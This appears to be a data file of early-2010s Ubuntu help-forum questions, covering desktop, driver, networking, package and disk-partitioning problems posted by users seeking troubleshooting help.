112809	problem with workspaces in xubuntu 11.10 compiz	i have installed compiz in my xubuntu 11.10 desktop -- x64 . i was trying to figure out how the workspaces work in this new set up . now i have a problem that i need to resolve before i can get back to fix the original problem . the problem is this : with shift + alt + mouse middle button , a menu came up where it showed an option saying i could add a workspace . i did that . this second workspace is a black diagonal from top left to bottom right . nothing else works once that comes up . in that menu , there is another option that says to remove the workspace . that does n't work . hope someone can help me remove that . and then point me to some literature re workspaces in compiz/xubuntu 11.10 . i think workspaces became rather complicated after the compiz install .
112811	atheros ar5b125 wireless driver	i have an atheros ar5b125 , ca n't find any drivers for it , all i 've seen are drivers for windows7 , none for any linux distro . what should i do to get it working under ubuntu ?
112815	whats the commands for continuing installation of 10.10 in xp using daemons tool	ok ... .i have an image cd of ubunto10.10 and my friend told me to use deamons tool to put it in the laptop . so , i did that virtual thing and then the machine ask if i want install alongside with xp , cause the other option is kind of not work . he try to install and then get to the thing with 5 options like : normal mode , demo mode and others . anyone of them i take , it goes to the point that says : cant find the mac adresse or something , then he give me the choice to tipe a word of command , but i dont know witch one ... ..there are so many i have try : cut-kill-umount-exit-etc , etc , etc ... ..and finally always says cant boot ubuntu : (
112818	man pages from custom location	when i build some source in custom location , i.e . : configure -- prefix= $ home/.local and then , make install ... , man pages are copied in ~/.local/share/man/ but inaccessible from man command how can i make man recognise pages in my custom location ?
112832	logging in over and over again . how to fix this ?	ok , i messed up . i installed ubuntu 11.10 , installed awesome wm and removed unity , to have something to fall back on , i also installed gnome-session-fallback . i was messing around and did the following , because the awesome wiki told me to : gconftool-2 -- type bool -- set /apps/nautilus/preferences/show_desktop false # still disable the buggy nautilus desktop thing gconftool-2 -- type string -- set /desktop/gnome/session/required_components/windowmanager awesome # sets awesome as wm now here 's what 's wrong : i can start up decently , and then i get into a login window ( that of gnome-session-fallback ) . i enter my username , select the preferred window manager ( awesome in my case ) and enter my password . it accepts these , but then hold for a second and just opens the login window again , in effect preventing me from actually logging in . i also tried gconftool-2 -- unset ( from the tty ) on these settings , but that did n't work either . what can i do to revert the gconftool-2 settings to something that should work ? i tried apt-get purging gnome-session-fallback and lightdm , and then installing them again , but that did n't work .
112838	starting awesome-wm when using startx ?	i uninstalled gnome-session-fallback and gdm , when i start the machine , it boots in console mode . i can log in normally . using startx starts up the remnants of gnome that are still on my machine ( a desktop with icons and hardly any ui ) . how could i set my xorg settings so that awesome is started when i use startx ?
112845	brightness of screen to dark , no regulation possible	i have installed on a laptop ubuntu 11.10 ( oneiric ocelot ) , it 's working fine , but the screen is mutch to dark and no regulation is possible . grafic card : ati mobility radeon x1350 .
112848	how do i restore my mouse sensitivity/acceleration settings to their defaults	i changed the mouse sensitivity/acceleration settings in system settings\mouse and touch pad . how do i restore these settings back to their default values ?
112850	what different wm 's are available on ubuntu ?	what are the various window managers that is available to a user on ubuntu and how can i install them ? one wm per post please : ) linked question : what different de 's and shells are available ?
112852	how can i open an .xps file in evince ?	on projects.gnome.org i read that evince/document viewer supports xps-files . but when i try to open an xps-file i get the error message unable to open documentfile type zip archive ( application/zip ) is not supported reading `` the full list of supported document formats '' on live.gnome.org i ca n't find xps there . now i ask myself ( and you ) : is n't document viewer able to open xps-files , or is there something wrong with that xps-file i try to open ? i specifically want to do this with ubuntu 11.10 oneiric . i 'd like to see a solution for evince or gnome in general , not get a recommendation for a kde application like here .
112860	is there a way to get an access token via ubuntuone oauth ?	i 'm working on a web app that includes a file export to dropbox and skydrive and i wanted to add ubuntuone , too . that means i need access to files and if i understand the u1 api docs correctly the only oauth token with access to files is full access token : https : //one.ubuntu.com/developer/account_admin/issue_tokens/cloud but requesting a full access token requires the user to type in his username and password into my app , is that correct ? or is there another way to get a request a token with access to the user 's files the same way a limited access token is requested , i.e . the user does n't have to provide his username and password to my app ?
112863	rsync not working between ntfs/fat and ext	i have music that i play in my car , from an fat32 usb stick . the folder which i use to put songs on is stored on my ext4 hard drive . i add/remove/retag songs regularly and occassionally want to rsync the changes to the usb stick . but for some unknown reason ( maybe permissions ? ) , rsync copies all the files every time rather than just changed ones . i am calling rsync like : rsync -vrlptgd source dest how can i make it work like i want it to ( i.e . know when a file has n't been changed and do n't copy it ) ?
112865	how do i revert all packages to their official versions ?	i 've installed a number of packages from ppas , and i would like to revert to official versions now . many of the ppas no longer exist in /etc/apt/sources.list.d , so ppa-purge will not work on them . what is the most straight-forward way for that ?
112869	where is the problem with port 22 ?	i want to connect with my university and use a cluster . i connect via vpn with university.now i want to connect with the cluster with ssh protocol . i have the ip , so in a terminal i write `` ssh ip '' ( of the cluster ) ssh : connect to host xxx.xxx.xxx.xxx port 22 : connection timed out what may be wrong ?
112874	how to restore file copy / transfer status window ?	i 'm working on ubuntu 11.10 gnome classic . i copying file ( ~40gb ) to external hd . while file copy in progress i mistakenly minimized the status window . after that i cant reopen that status window . b'z of that i cant identify whether that the transmission has completed or not . pls . help to restore the status window or how can i know the status of that transmission .
112885	dhcp server not routing to connect to internet for clients	i am configuring a dhcp server using ubuntu 11.10 with 2 lan cards.eth0 is connected to wan on ip address:192.168.2.2/24 and eth1 connected to lan is configured with ip:192.168.10.1/24 gateway:192.168.10.1. i have configured my /etc/dhcp/dhcp.conf as default-lease-time 600 ; max-lease-time 7200 ; option subnet-mask 255.255.255.0 ; option broadcast-address 192.168.10.255 ; option routers 192.168.10.254 ; option domain-name-servers 192.168.10.1 , 192.168.10.2 ; subnet 192.168.10.0 netmask 255.255.255.0 { range 192.168.10.10 192.168.10.100 ; } /etc/default/isc-dhcp-server interfaces= '' eth1 '' /etc/network/interfaces auto lo iface lo inet loopback auto eth1 iface eth1 inet static address 192.168.10.1 netmask 255.255.255.0 gateway 192.168.10.1 broadcast 192.168.10.255 /etc/sysctl.conf net.ipv4.ip_forward=1 after these things i did as iptables -- flush iptables -- table nat -- flush iptables -- delete-chain iptables -a input -i lo -j accept iptables -a output -o lo -j accept iptables -a input -m conntrack -- ctstate established , related -j accept iptables -a output -m conntrack -- ctstate new , established , related -j accept iptables -t nat -a postrouting -o eth0 -j masquerade iptables -a forward -i eth1 -j accept iptables-save | sudo tee /etc/iptables.sav sudo sh -c `` echo 1 > /proc/sys/net/ipv4/ip_forward '' /etc/resolv.conf is getting name server by default all the time . i am able to use browse internet on this server but not from client side.my dhcp server is running properly from client machine i am able to ping eth1 as well as eth0 but not able to connect to internet is there any thing i am missing here . please someone help me ...
112886	how can i block updates for specific application ?	i want keep my system updated but i do n't want that a specific application is updated ! in my case thunderbird . i do n't want to uncheck every time proposed updates for thunderbird . how can i add an exception in the update-manager ?
112890	intermittent temporary gui freeze in ubuntu 11.10	i 've been using ubuntu 11.10 for a month or so . in the last week it 's started freezing randomly ( every few hours or minutes ) . i can still move the mouse and switch to other terminals with ctrl+alt . i thought this was purely a gui issue as i could continue entering commands ( mouse clicks and keys ) which seem to be processed once the system resumes ( generally 30 seconds to a few minutes ) . i 'm using gnome and metacity . i ca n't identify anything in particular that triggers the freezes . saving a file in libreoffice causes the system to hang . i tried disabling most of the services i 've installed ( dropbox , autokey , etc . ) but does n't help . switching to another terminal and running top , the cpu column is shared equally among all of my processes ( i.e . non-root ) . i have no idea what that signifies . my pc is unusable in this state . cpu model name : pentium ( r ) dual-core cpu e6700 @ 3.20ghz [ 7m pid user pr ni virt res shr s % cpu % mem time+ command [ 0 ; 10m [ 39 ; 49m [ k [ 0 ; 10m [ 0 ; 10m 1499 ogga 20 0 404m 32m 13m r 10 0.8 0:28.19 python [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m [ 0 ; 10m 1501 ogga 20 0 216m 13m 6224 r 10 0.3 0:18.28 ibus-x11 [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m [ 0 ; 10m 1679 ogga 20 0 449m 34m 15m r 10 0.9 0:41.10 gnome-panel [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m [ 0 ; 10m 1710 ogga 20 0 350m 15m 8324 r 10 0.4 0:18.25 bluetooth-apple [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m [ 0 ; 10m 1752 ogga 20 0 458m 37m 13m r 10 0.9 0:22.62 autokey-gtk [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m [ 0 ; 10m 2081 ogga 20 0 354m 17m 9800 r 10 0.5 0:16.36 update-notifier [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m [ 0 ; 10m 5439 ogga 20 0 640m 104m 38m r 10 2.6 0:45.17 chromium-browse [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m [ 0 ; 10m 5586 ogga 20 0 381m 42m 21m r 10 1.1 0:20.17 chromium-browse [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m [ 0 ; 10m 6422 ogga 20 0 529m 59m 18m r 10 1.5 0:28.15 sublime_text [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m [ 0 ; 10m 1362 ogga 20 0 264m 14m 7884 r 8 0.4 0:18.29 gnome-session [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m [ 0 ; 10m 1673 ogga 20 0 351m 17m 9768 r 8 0.4 0:21.78 metacity [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m [ 0 ; 10m 1708 ogga 20 0 249m 13m 7156 r 8 0.3 0:18.23 gnome-fallback- [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m [ 0 ; 10m 1709 ogga 20 0 572m 28m 15m r 8 0.7 0:18.37 nautilus [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m [ 0 ; 10m 1722 ogga 20 0 467m 18m 9m r 8 0.5 0:18.43 nm-applet [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m [ 0 ; 10m 1727 ogga 20 0 225m 12m 6304 r 8 0.3 0:18.24 polkit-gnome-au [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m [ 0 ; 10m 1731 ogga 20 0 422m 19m 10m r 8 0.5 0:26.62 gnome-sound-app [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m [ 0 ; 10m 1735 ogga 20 0 306m 31m 13m r 8 0.8 0:18.37 python [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m [ 0 ; 10m 1754 ogga 20 0 286m 16m 8912 r 8 0.4 0:18.90 vino-server [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m [ 0 ; 10m 1798 ogga 20 0 246m 15m 7476 r 8 0.4 0:18.25 gnome-screensav [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m [ 0 ; 10m 1851 ogga 20 0 185m 14m 7256 r 8 0.4 0:18.18 gdu-notificatio [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m [ 0 ; 10m 1923 ogga 20 0 251m 28m 11m r 8 0.7 0:17.96 applet.py [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m [ 0 ; 10m 4085 ogga 20 0 378m 22m 11m r 8 0.6 0:18.19 gnome-terminal [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 4213 ogga 20 0 263m 73m 15m s 2 1.9 3:57.44 skype [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 1 root 20 0 24188 1492 1320 s 0 0.0 0:00.45 init [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 2 root 20 0 0 0 0 s 0 0.0 0:00.00 kthreadd [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 3 root 20 0 0 0 0 s 0 0.0 0:02.27 ksoftirqd/0 [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 6 root rt 0 0 0 0 s 0 0.0 0:00.00 migration/0 [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 7 root rt 0 0 0 0 s 0 0.0 0:00.00 migration/1 [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 9 root 20 0 0 0 0 s 0 0.0 0:01.97 ksoftirqd/1 [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 10 root 20 0 0 0 0 s 0 0.0 0:01.16 kworker/0:1 [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 11 root 0 -20 0 0 0 s 0 0.0 0:00.00 cpuset [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 12 root 0 -20 0 0 0 s 0 0.0 0:00.00 khelper [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 13 root 0 -20 0 0 0 s 0 0.0 0:00.00 netns [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 15 root 20 0 0 0 0 s 0 0.0 0:00.00 sync_supers [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 16 root 20 0 0 0 0 s 0 0.0 0:00.00 bdi-default [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 17 root 0 -20 0 0 0 s 0 0.0 0:00.00 kintegrityd [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 18 root 0 -20 0 0 0 s 0 0.0 0:00.00 kblockd [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 19 root 0 -20 0 0 0 s 0 0.0 0:00.00 ata_sff [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 20 root 20 0 0 0 0 s 0 0.0 0:00.00 khubd [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 21 root 0 -20 0 0 0 s 0 0.0 0:00.00 md [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 23 root 20 0 0 0 0 s 0 0.0 0:00.00 khungtaskd [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 24 root 20 0 0 0 0 s 0 0.0 0:00.14 kswapd0 [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 25 root 25 5 0 0 0 s 0 0.0 0:00.00 ksmd [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 26 root 39 19 0 0 0 s 0 0.0 0:00.00 khugepaged [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 27 root 20 0 0 0 0 s 0 0.0 0:00.00 fsnotify_mark [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 28 root 20 0 0 0 0 s 0 0.0 0:00.00 ecryptfs-kthrea [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 29 root 0 -20 0 0 0 s 0 0.0 0:00.00 crypto [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 37 root 0 -20 0 0 0 s 0 0.0 0:00.00 kthrotld [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 38 root 20 0 0 0 0 s 0 0.0 0:00.00 scsi_eh_0 [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 39 root 20 0 0 0 0 s 0 0.0 0:00.00 scsi_eh_1 [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 41 root 20 0 0 0 0 s 0 0.0 0:00.00 scsi_eh_2 [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 42 root 20 0 0 0 0 s 0 0.0 0:00.00 scsi_eh_3 [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 64 root 20 0 0 0 0 s 0 0.0 0:02.98 kworker/0:2 [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 242 root 20 0 0 0 0 s 0 0.0 0:00.39 jbd2/sdb1-8 [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 243 root 0 -20 0 0 0 s 0 0.0 0:00.00 ext4-dio-unwrit [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 288 root 20 0 17236 448 448 s 0 0.0 0:00.04 upstart-udev-br [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 295 root 20 0 21752 884 796 s 0 0.0 0:00.06 udevd and at another time : [ 7m pid user pr ni virt res shr s % cpu % mem time+ command [ 0 ; 10m [ 39 ; 49m [ k [ 0 ; 10m [ 0 ; 10m 1757 ogga 20 0 222m 9932 6300 r 13 0.2 0:05.69 polkit-gnome-au [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m [ 0 ; 10m 1559 ogga 20 0 152m 9764 6112 r 13 0.2 0:05.77 ibus-x11 [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m [ 0 ; 10m 1786 ogga 20 0 457m 33m 13m r 13 0.9 0:06.10 autokey-gtk [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m [ 0 ; 10m 1395 ogga 20 0 262m 12m 7880 r 12 0.3 0:05.88 gnome-session [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m [ 0 ; 10m 1557 ogga 20 0 403m 31m 13m r 12 0.8 0:14.95 python [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m [ 0 ; 10m 1745 ogga 20 0 247m 11m 7196 r 12 0.3 0:05.69 gnome-fallback- [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m [ 0 ; 10m 1767 ogga 20 0 237m 26m 11m r 12 0.7 0:05.87 python [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m [ 0 ; 10m 1713 ogga 20 0 440m 25m 13m r 12 0.6 0:13.76 gnome-panel [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m [ 0 ; 10m 1747 ogga 20 0 348m 13m 8328 r 11 0.3 0:05.22 bluetooth-apple [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m [ 0 ; 10m 1754 ogga 20 0 465m 16m 10m r 11 0.4 0:05.21 nm-applet [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m [ 0 ; 10m 1710 ogga 20 0 167m 11m 7564 r 11 0.3 0:05.21 metacity [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m [ 0 ; 10m 1761 ogga 20 0 406m 17m 9928 r 11 0.4 0:12.71 gnome-sound-app [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m [ 0 ; 10m 1789 ogga 20 0 283m 13m 8852 r 11 0.3 0:05.55 vino-server [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m [ 0 ; 10m 1815 ogga 20 0 243m 11m 7452 r 11 0.3 0:05.17 gnome-screensav [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m [ 0 ; 10m 1885 ogga 20 0 182m 11m 7256 r 11 0.3 0:05.18 gdu-notificatio [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m [ 0 ; 10m 1957 ogga 20 0 249m 25m 11m r 11 0.7 0:05.32 applet.py [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m [ 0 ; 10m 2067 ogga 20 0 260m 12m 7828 r 11 0.3 0:05.21 update-notifier [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 1975 ogga 20 0 292m 48m 11m s 0 1.2 0:08.28 ubuntuone-syncd [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m [ 0 ; 10m 2363 ogga 20 0 21468 1384 988 r 0 0.0 0:00.01 top [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 1 root 20 0 24284 2296 1320 s 0 0.1 0:00.46 init [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 2 root 20 0 0 0 0 s 0 0.0 0:00.00 kthreadd [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 3 root 20 0 0 0 0 s 0 0.0 0:00.05 ksoftirqd/0 [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 4 root 20 0 0 0 0 s 0 0.0 0:00.00 kworker/0:0 [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 5 root 20 0 0 0 0 s 0 0.0 0:00.19 kworker/u:0 [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 6 root rt 0 0 0 0 s 0 0.0 0:00.00 migration/0 [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 7 root rt 0 0 0 0 s 0 0.0 0:00.00 migration/1 [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 8 root 20 0 0 0 0 s 0 0.0 0:00.00 kworker/1:0 [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 9 root 20 0 0 0 0 s 0 0.0 0:00.06 ksoftirqd/1 [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 10 root 20 0 0 0 0 s 0 0.0 0:00.09 kworker/0:1 [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 11 root 0 -20 0 0 0 s 0 0.0 0:00.00 cpuset [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 12 root 0 -20 0 0 0 s 0 0.0 0:00.00 khelper [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 13 root 0 -20 0 0 0 s 0 0.0 0:00.00 netns [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 14 root 20 0 0 0 0 s 0 0.0 0:00.25 kworker/u:1 [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 15 root 20 0 0 0 0 s 0 0.0 0:00.00 sync_supers [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 16 root 20 0 0 0 0 s 0 0.0 0:00.00 bdi-default [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 17 root 0 -20 0 0 0 s 0 0.0 0:00.00 kintegrityd [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 18 root 0 -20 0 0 0 s 0 0.0 0:00.00 kblockd [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 19 root 0 -20 0 0 0 s 0 0.0 0:00.00 ata_sff [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 20 root 20 0 0 0 0 s 0 0.0 0:00.00 khubd [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 21 root 0 -20 0 0 0 s 0 0.0 0:00.00 md [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 22 root 20 0 0 0 0 s 0 0.0 0:00.22 kworker/1:1 [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 23 root 20 0 0 0 0 s 0 0.0 0:00.00 khungtaskd [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 24 root 20 0 0 0 0 s 0 0.0 0:00.00 kswapd0 [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 25 root 25 5 0 0 0 s 0 0.0 0:00.00 ksmd [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 26 root 39 19 0 0 0 s 0 0.0 0:00.00 khugepaged [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 27 root 20 0 0 0 0 s 0 0.0 0:00.00 fsnotify_mark [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 28 root 20 0 0 0 0 s 0 0.0 0:00.00 ecryptfs-kthrea [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 29 root 0 -20 0 0 0 s 0 0.0 0:00.00 crypto [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 37 root 0 -20 0 0 0 s 0 0.0 0:00.00 kthrotld [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 38 root 20 0 0 0 0 s 0 0.0 0:00.00 scsi_eh_0 [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 39 root 20 0 0 0 0 s 0 0.0 0:00.00 scsi_eh_1 [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 40 root 20 0 0 0 0 s 0 0.0 0:00.00 kworker/u:2 [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 41 root 20 0 0 0 0 s 0 0.0 0:00.00 scsi_eh_2 [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 42 root 20 0 0 0 0 s 0 0.0 0:00.00 scsi_eh_3 [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 43 root 20 0 0 0 0 s 0 0.0 0:00.00 kworker/u:3 [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 44 root 20 0 0 0 0 s 0 0.0 0:00.00 kworker/u:4 [ 0 ; 10m [ 39 ; 49m [ 0 ; 10m 45 root 20 0 0 0 0 s 0 0.0 0:00.00 kworker/u:5 [ 0 ; 10m [ 39 ; 49m [ 6 ; 1h [ k sorry about the horrible formatting . thanks for any suggestions ... edit : i notice that my virtual computer ( win7 64 on virtualbox ) continues to respond most of the time during these 'freezes' edit2 : i suspect this is something to do with ui priority being too low ... but i do n't know enough about linux to know how to address that .
112893	can i boot from external usb hdd ?	i have bootable ubuntu usb and everything is working fine . note that i can boot only from usb or cd/dvd . now i want to install new programs , edit my own files etc ... so i thought that the best solution would be to boot fom my external ( 160gb wd ) or have root directory automatically mounted to the external hdd when booting from usb is any from above possible ?
112894	problems compiling wireshark from source ( svn ) during .calling /configure	today i 've tried to compile wireshark locally ( no make install ) from svn as i 've done before . when i call .configure i receive an error , that the file gtk/doxygen.cfg.in was not available : config.status : error : can not find input file : `gtk/doxygen.cfg.in' i have no clue what to do to avoid this problem . has anyone else encountered tthis problem or is somehow able to give me some tips ?
112900	how to change from ubuntu dual boot to a single ubuntu boot ( used wubi installer for windows )	i am quite new to ubuntu and i would like to know how to change from a ubuntu-windows dual boot to a single boot of ubuntu . i would also like to increase the space in the ubuntu partition . please explain this in easy to understand steps , as i am new to ubuntu .
112901	alternative terminal for ubuntu that supports predefined sessions	i am looking for a better ( gui ) terminal for ubuntu that supports : tabs , preferably colored ones change notification - output is changed on an inactive terminal define a list of servers to connect to the default terminal app does supports tabs but not the things above .
112904	awesome-wm inside gnome-shell - > get rid of top panels	i am using awesome-wm now , and was trying to get it working with gnome-shell . i have basically followed those steps : http : //awesome.naquadah.org/wiki/quickly_setting_up_awesome_with_gnome # ubuntu_11.10 but now i have two panels , one at the bottom and one at the top . is there any way to get rid of one of those ( preferring top panels ) . if that is not possible , is there a way to load the gnome-shell applets in the top panel ? now it 's only displaying the time . screen : thanks ; )
112905	where can i find asrock e350m1 integrated amd radeon hd 6310 graphics driver ?	i just built a desktop computer using an asrock e350m1 board , powered by an amd fusion e-350 apu ( amd radeon hd 6310 gpu model ) . i installed ubuntu 10.04 . did all the updates . almost everything works great : i can see movies ( dvd ) , surf , etc. , but i can not play games -- screen frames are very , very slow . i have not installed any hardware drivers . when i search ( in ubuntu ) for the hardware drivers , none are found . i found here , http : //wiki.cchtml.com/index.php/hardware that the graphics card is officially supported : palm | radeon hd 6250/6310 if this is of any help , this is what i entered on the terminal : lspci -nn | grep vga 00:01.0 vga compatible controller [ 0300 ] : ati technologies inc device [ 1002:9802 ] ^c sudo apt-get install build-essential cdbs fakeroot dh-make debhelper debconf libstdc++6 dkms libqtgui4 wget execstack libelfg0 dh-modaliases [ sudo ] password for pat : reading package lists ... done building dependency tree reading state information ... done debconf is already the newest version . libstdc++6 is already the newest version . libqtgui4 is already the newest version . libqtgui4 set to manually installed . wget is already the newest version . e : could n't find package dh-modaliases i do not know what to do from here . questions : where can i locate the drivers ? how do i install the drivers ?
112907	where are fsck results logged at boot time , after /forcefsck ?	when working remotely i set a server to force an fsck at boot time with the sudo touch /forcefsck command and rebooted . after it restarted i checked in /var/log/fsck for the results of the disk check . both checkfs and checkroot said : nothing has been logged yet so where is it saving the results ? - ( i 'll add that this was on an 11.10 server )
112913	what versions of ubuntu have shipped unity ?	i was just wondering if there is another version of ubuntu , ( besides 11.10 ) that uses unity , because i do not like to use betas and i absolutely love the unity gui . thanks
112921	help me ! ! extract partition table gpt	english is not my native language , so i apologize . i want to remove the partition table from my hard drive /dev/sdb and then put it on my disk /dev/sda , but when running the following command : sudo sfdisk -d /dev/sdb | sed s/sdb/sdc/ > part.sdb i get this error : aviso : ¡gpt ( tabla de partición guid ) detectada en «/dev/sdb» ! la utilidad sfdisk no soporta gpt . use gnu parted . error , literal translation ( real error in english could be very different ) warning : gpt ( guid partition table ) detected on /dev/sdb ! . sfidk utility does n't support gtp , please use gnu parted . i have little linux knowledge , but by reading little by little i 'm improving . can you help ? thank you very much ! hola , mi ingles no es mi lengua materna , por eso me disculpo . deseo extraer la tabla de particiones de mi disco duro /deb/sdb y luego colocar esta en mi disco /deb/sda , pero al realizar el comando siguiente : sudo sfdisk -d /dev/sdb | sed s/sdb/sdc/ > part.sdb aviso : ¡gpt ( tabla de partición guid ) detectada en «/dev/sdb» ! la utilidad sfdisk no soporta gpt . use gnu parted . no puedo realizarla . mis conocimientos de linux son pocos , pero leyendo poco a poco he podido . me pueden colaborar ? muchas gracias ! !
112922	clone an initial ubuntu 11.10 installation for different users	i have a question and hope you guys would be able to help me out . i am going to make an fresh ubuntu 11.10 installation . while installing , i would create the user `` chris '' . afterwards i would configure the desktop and install lots of stuff for the user `` chris '' . some of this stuff would be i.e . rvm ( ruby version manager ) which will create lots of files in my /home/chris folder . so at the end there would be lots of stuff in my /home/chris folder , incl . files refering to `` /home/chris/some_stuff/ ... '' , etc . when all is set and done , i would make an image of the installation using fsarchiver and restore the image to 2 other identical laptops . so far everything works perfect ! the problem is : the 2 other laptops need to have 2 different users : `` marco '' and `` flo '' . those 2 users need exactly the installed stuff i have in /home/chris . so their home folder would be /home/marco and /home/flo . how do i change the user name from `` chris '' to `` marco '' after restoring the image to marco 's laptop ? my initial user account /home/chris wo n't make any sense on marco 's laptop , right ? and here comes the most important question : how will i manage to find out all files which contain the string `` /home/chris '' and change it to `` /home/marco '' ? maybe there is a better way of making a default install on a default user , backup the installation and then redistribute it to any other user . can somebody help me ? thanks ! chris
112926	secure apt gpg problem with release files	i 'm experiencing a problem with apt . we 're using our own repository and the users apt is configured to check the peer and host of the repository . furthermore the release file is verified ( with the matching gpg key from apt-key ) . so , for testing i 'm trying the following scenario : sign the release files with an untrusted key restart repository when user trys to update the following warning will appear during an upgrade : warning : the following packages can not be authenticated ! < list of unauthenticated package names > this is as expected so far ... sign the release files with a trusted key restart repository now the update should work . however i am still getting the warning from step 3 note : if i run only steps 4-6 on a fresh system everything works fine . background information : i 'm on ubuntu 10.04 with apt-0.7.25.3ubuntu9.9 i found out that sometimes if apt-get update is run and the release file changed ( because of other checksums ) , it 's appended to the local release file in /var/lib/apt/lists or /var/lib/apt/lists/partial ( i was n't able to reproduce this correctly ) . as a result of this i basically have two release files in one . ergo the gpg verify will fail , since it expects only one real release file . so why does apt not clean up old release files before an update ? - is this a bug ( since the release.gpg file is replaced correctly and not appended ) ? - or should there always be all versions of release files in my single release file in my repository ( i doubt that ) ? edit : if i delete the local release , package etc . files from /var/lib/apt/lists and /var/lib/apt/lists/partial before running step 6 , everything works fine .
